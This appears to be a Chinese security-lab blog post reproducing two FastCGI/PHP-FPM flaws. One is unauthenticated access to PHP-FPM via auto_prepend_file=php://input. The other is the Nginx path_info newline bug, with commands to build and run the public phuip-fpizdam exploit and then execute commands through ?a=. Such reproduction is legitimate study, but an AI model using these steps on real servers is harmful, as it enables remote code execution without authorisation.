FastCGI漏洞复现

2020-08-28 15:35:17 浏览数 (1)

文章源自【字节脉搏社区】-字节脉搏实验室

作者-Jadore

FastCGI之未授权访问

FastCGI是一个通信协议,可以用来进行数据交换,也即中间件和某个后端语言进行数据交换的协议。

PHP-FPM(FastCGI进程管理器):解析FastCGI协议,即当中间件将用户的请求按照FastCGI的规则打包好后传送给FPM进行解析。

Vul:PHP-FPM默认监听9000端口,如果该端口可访问,则攻击者可以构造FastCGI协议和FPM进行通信。

利用条件:

找到一个已存在的PHP文件

此处附上EXP:

auto_prepend_file = php://input,等于在执行任何php文件前都要包含一遍content的内容。所以,把待执行的代码放在content中,并且开启allow_url_include = On就能达到执行任意PHP代码。

使用exp去访问一个非php的文件会被拒绝

如果申请访问一个存在的php文件则

让其在执行PEAR.php文件之前包含某个文件达到命令执行的命令

FastCGI之任意命令执行

Vul:Nginx 上 fastcgi_split_path_info 在处理带有 的请求时,会因为遇到换行符 n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。

Nginx php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞:

Tsudo apt install golang-go

将export PATH=$PATH:/usr/local/go/bin添加至/etc/profile再执行source /etc/profile

EXP

go:git clone https://github.com/neex/phuip-fpizdam

命令:

go build

./phuip-fpizdam

go run . http://ip:8080/index.php

由于只有一部分进程能被污染因此需要多试几次

最后访问:

http://ip:8080/index.php?a=命令即可

0 人点赞